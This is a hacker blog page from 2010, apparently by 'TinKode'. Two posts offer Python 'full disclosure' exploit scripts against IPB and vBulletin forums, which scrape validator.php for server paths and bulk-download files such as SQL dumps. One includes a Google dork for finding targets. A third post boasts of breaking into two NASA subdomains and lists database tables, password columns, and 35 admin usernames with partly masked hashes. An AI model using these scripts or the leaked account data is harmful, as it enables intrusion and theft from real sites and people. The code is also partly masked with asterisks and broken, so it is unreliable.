TinKode-IPB Full Disclosure Exploit [Python]

IPB Full Disclosure Exploit [Python]

Posted by isrtinkode on February 19, 2010

#! /usr/bin/env python3.1

################################################################
#           _____ _____  ____  (validator.php)            #
#         |_   _|  __ \|  _ \                            #
#    | | | |__) | |_) |                           #
#     | | |  ___/|  _ <                            #
#     _| |_| |    | |_) |                           #
#     |_____|_|    |____/                            #
#                                   @expl0it...                #
################################################################
#          [ IPB Files / Directories Full Disclosure ]         #
#    [ Vuln discovered by TinKode / xpl0it written by cmiN ]   #
#           [ Greetz: insecurity.ro, darkc0de.com ]            #
################################################################
#                                                              #
#                 Special thanks for: cmiN                     #
#                 www.TinKode.BayWords.com                     #
################################################################

#! /usr/bin/env python3.1 ################################################################ # _____ _____ ____ (validator.php) # # |_ _| __ \| _ \ # # | | | |__) | |_) | # # | | | ___/| _ < # # _| |_| | | |_) | # # |_____|_| |____/ # # @expl0it... # ################################################################ # [ IPB Files / Directories Full Disclosure ] # # [ Vuln discovered by TinKode / xpl0it written by cmiN ] # # [ Greetz: insecurity.ro, darkc0de.com ] # ################################################################ # # # Special thanks for: cmiN # # www.TinKode.BayWords.com # ################################################################ import os, sys, urllib.request, urllib.parse, threading def main(): logo = """ \t |---------------------------------------------------------------| \t | _____ _____ ____ (TM) | \t | |_ _| __ \| _ \ | \t | | | | |__) | |_) | | \t | | | | ___/| _ < | \t | _| |_| | | |_) | | \t | |_____|_| |____/ | \t | | \t | | \t | IPB Full Disclosure expl0it | \t | Written by cmiN | \t | Vulnerability discovered by TinKode | \t | | \t | | \t | Visit: www.insecurity.ro & www.darkc0de.com | \t |---------------------------------------------------------------| """ usage = """ |---------------------------------------------------------------| |Usage: ipbfd.py scan http://www.site.com/IPB_folder | | ipbfd.py download *.zip -> all | | ipbfd.py download name.jpg -> one | |---------------------------------------------------------------|""" if sys.platform in ("linux", "linux2"): clearing = "clear" else: clearing = "cls" os.system(clearing) print(logo) args = sys.argv if len(********) == 3: try: print("Please wait...") if args[1] == "********": extract_parse_save(********)) elif args[1] == "********": download_data(********]) except Exception as message: print("An error occurred: ********)) except: print("Unknown error.") else: print(********") else: print(usage) input() def extract_parse_save(url): print("[+]Extracting content...") hurl = url + "/validator.php" with ********.********) as usock: source = usock.read().decode() print("[+]Finding token...") word = "validate('" index = source.find(word) if index != -1: source = source[********):] value = source[:source.index(********)] hurl = url ********.format(********) else: print("[!]Token not found.") print("[+]********...") with urllib.request.******** as usock: lastk, lastv = None, None dictionary = dict() for line in usock: line = line.decode() index = line.find(********) if index != -1: lastk = line[index + ********" ").strip(********) index = line.find(********") if index != -1: lastv = line[index + ********:line.index("********")].********(" ") if lastk != None and lastv != None: index = ********") if index in (********, 0): lastk = "[other] {}".format(lastk) else: lastk = "[********}".format(********) dictionary[********astv ******** = None, None print("[+]Organizing and saving paths...") with open("********", "********") as fout: fout.write(********) keys = sorted(********) for key in keys: fout.write(********)) def download_data(files): print("[+]Searching ********...") mthreads = ******** with open(********) as fin: url = fin.readline()********) if files.find("*") == -1: hurl = ********) Download(hurl).start() else: ext = files[files.********] for line in fin: pieces = l********) if pieces[0].count(ext) == 1: upath = pieces[1] hurl = ********) while threading.active********reads: pass Download(********) while threading.active_count(******** pass class Download(********): def __********): threading.Thread.********) ******** = url def run(self): try: with urllib.request.urlopen(********usock: data = ********) uparser = urllib.parse.urlparse(********) pieces = uparser.********) ******** = pieces[********] with open(********) as fout: fout.********) except: pass ********__main__": main()

You must have python 3.1 to work!

Read More

TinKode-vBulletin Full Disclosure [Python]

vBulletin Full Disclosure [Python]

Posted by isrtinkode on February 19, 2010

#! /usr/bin/env python3.1
#
################################################################
#                ____        _ _      _   _ (validator.php)    #
#               |  _ \      | | |    | | (_)                   #
#         __   _| |_) |_   _| | | ___| |_ _ _ __               #
#         \ \ / /  _ <| | | | | |/ _ \ __| | '_ \              #
#          \ V /| |_) | |_| | | |  __/ |_| | | | |             #
#           \_/ |____/ \__,_|_|_|\___|\__|_|_| |_|             #
#                                   @expl0it...                #
################################################################
#       [ vBulletin Files / Directories Full Disclosure ]      #
#    [ Vuln discovered by TinKode / xpl0it written by cmiN ]   #
#           [ Greetz: insecurity.ro, darkc0de.com ]            #
################################################################
#                                                              #
#                  Special thanks for: cmiN                    #
#                  www.TinKode.BayWords.com                    #
################################################################

#! /usr/bin/env python3.1 # ################################################################ # ____ _ _ _ _ (validator.php) # # | _ \ | | | | | (_) # # __ _| |_) |_ _| | | ___| |_ _ _ __ # # \ \ / / _ <| | | | | |/ _ \ __| | '_ \ # # \ V /| |_) | |_| | | | __/ |_| | | | | # # \_/ |____/ \__,_|_|_|\___|\__|_|_| |_| # # @expl0it... # ################################################################ # [ vBulletin Files / Directories Full Disclosure ] # # [ Vuln discovered by TinKode / xpl0it written by cmiN ] # # [ Greetz: insecurity.ro, darkc0de.com ] # ################################################################ # # # Special thanks for: cmiN # # www.TinKode.BayWords.com # ################################################################ import os, sys, urllib.request, urllib.parse, threading def main(): logo = """ \t |---------------------------------------------------------------| \t | ____ _ _ _ _ (TM) | \t | | _ \ | | | | | (_) | \t | __ _| |_) |_ _| | | ___| |_ _ _ __ | \t | \ \ / / _ <| | | | | |/ _ \ __| | '_ \ | \t | \ V /| |_) | |_| | | | __/ |_| | | | | | \t | \_/ |____/ \__,_|_|_|\___|\__|_|_| |_| | \t | | \t | vBulletin Full Disclosure expl0it | \t | Written by cmiN | \t | Vulnerability discovered by TinKode | \t | | \t | Dork: intext:"Powered by vBulletin" | \t | Visit: www.insecurity.ro & www.darkc0de.com | \t |---------------------------------------------------------------| """ usage = """ |---------------------------------------------------------------| |Usage: vbfd.py scan http://www.site.com/vB_folder | | vbfd.py download *.sql -> all | | vbfd.py download name.jpg -> one | |---------------------------------------------------------------|""" if sys.platform in ("linux", "linux2"): clearing = "clear" else: clearing = "cls" os.system(clearing) print(logo) args = sys.argv if len(args) == 3: try: print("Please wait...") if args[1] == "scan": extract_parse_save(********)) elif args[1] == "********": download_data(********) except Exception as message: print("An error occurred: {}".********) except: print("Unknown error.") else: print(********) else: print(usage) input() def extract_parse_save(url): print("[+]********...") hurl = url + "/validator.php" with urllib.request.******** as usock: source = ********() print("[+]Finding ********") word = "validate('" source = source[source******** + len(word):] value = ********] print("[+]Obtaining paths...") hurl = url + "/validator********(value) with urllib.request.urlopen(hurl) as usock: lastk, lastv = None, None dictionary = dict() for line in usock: line = ********() index = ********") if index != -1: lastk = line[index ********(" ") index = line.find("********") if index != -1: lastv = line********) if lastk != None and lastv != None: index = ********) if index in (-1, 0): lastk = "********) else: lastk = "[{}] {}".format(********) dictionary[lastk] = lastv lastk, lastv = None, None print("[+]Organizing and saving paths...") with open(********) as fout: fout.********) keys = sorted(dictionary.keys()) for key in keys: fout.write********(key, dictionary[key])) def download_data(files): print("[+]Searching and downloading files...") ******** = 50 with open("********) as fin: url = fin.readline(********) if files.find******** hurl = url + ********) Download(hurl).start() else: ext = files[files.********] for line in fin: pieces = line********) if pieces[0].******** upath = pieces[1] hurl = ********) while threading.active_********) > ******** pass Download(********).start() while threading.********) > 1: pass class Download(********): def __init__(self, url): threading.Thread.__********) self.url = ******** def run(********): try: with urllib.request.urlopen(self.url) as usock: data = ********() uparser = urllib.parse.urlparse(********) pieces = ********.********) fname = pieces[********] with open(********) as fout: ********.write(data) except: pass ********"__main__": main()

You need python 3.1 to work!

Read More

TinKode-NASA 2 Websites Full Access

NASA 2 Websites Full Access

Posted by isrtinkode on February 19, 2010

 _   _
| \ | | __ _ ___  __ _
|  \| |/ _` / __|/ _` |
| |\  | (_| \__ \ (_| |
|_| \_|\__,_|___/\__,_|

      #owned by c0de.breaker

I had access to:

www.istd.gsfc.nasa.gov
www.sed.gsfc.nasa.gov

Some screens:

http://i44.tinypic.com/vnjl10.png

http://i41.tinypic.com/25j9zle.png

http://i37.tinypic.com/294t26t.png

http://i35.tinypic.com/qnpf9y.png

http://i38.tinypic.com/23r5mw.png

http://i37.tinypic.com/2rfe92u.png

http://i35.tinypic.com/a57s5e.png

Informations:

#Version: 5.0.41-community-nt-log
#User: **********.gsfc.nasa.gov
#Principal Database: *****

Tables from “*****” database:

#access
#branch
#docs
#docsbranch
#intro
#programs

Columns from “access” table:

#Id
#firstName
#lastName
#userName
#userID
#passWd
#projAdmin
#branchAdmin
#userAdmin
#userEmail
#deleteFlag
#dateCreated
#dateExp

Admins Accounts:

http://www.istd.gsfc.nasa.gov
[1]c****n:****2b550647
[2]c****n:****457ee5exxx = pass
[3]c****n:****14414xxx
[4]am****s:****df47xxx
[5]m****a:****b668859ca = demo
[6]pm****es:****b668859ca = demo
[7]hb****h:****b410747xxx
[8]rb****rut:****b410747xxx
[9]bw****r:****f299589xxx
[10]j****on:****dc4acc0xxx
[11]j****s:****c4acc0xxx
[12]l****ia:****4746f1dxxx
[13]g****w:****33e5ba3axxx
[14]j****le:****ff639f44xxx
[15]d****k:****0cf29958xxx
[16]A****s:****42fa7cxxx

http://www.sed.gsfc.nasa.gov
[17]l****y:****c17889xxx
[18]k****m:****9040104xxx
[19]j****ch:****dc4acc0xxx
[20]c****rmann:****027e9a6xxx
[21]rw****ey:****d42fa7cxxx
[22]y****e:****6107b5cxxx
[23]s****n:****cf29958xxx
[24]b****i:****dd3b569xxx
[25]lr****y:****410747xxx
[26]e****l:****bf05750xxx
[27]cd****ka:****bb79660xxx
[29]j****es:****e4746f1xxx
[30]r****z:****d75fb3exxx
[31]t****ley:****90f14657de5 = d41d8cd9
[32]e****ks:****d75fb3exxx
[33]ph****es:****6e3e050xxx
[34]pp****an:****0877c779xxx
[35]ac****n:****5eb1a0fexxx

I didn’t want to damage anything. Only to show that nasa subdomains have many SQLI, XSS, vulnerabilities etc

#Finish, c0de.breaker

Read More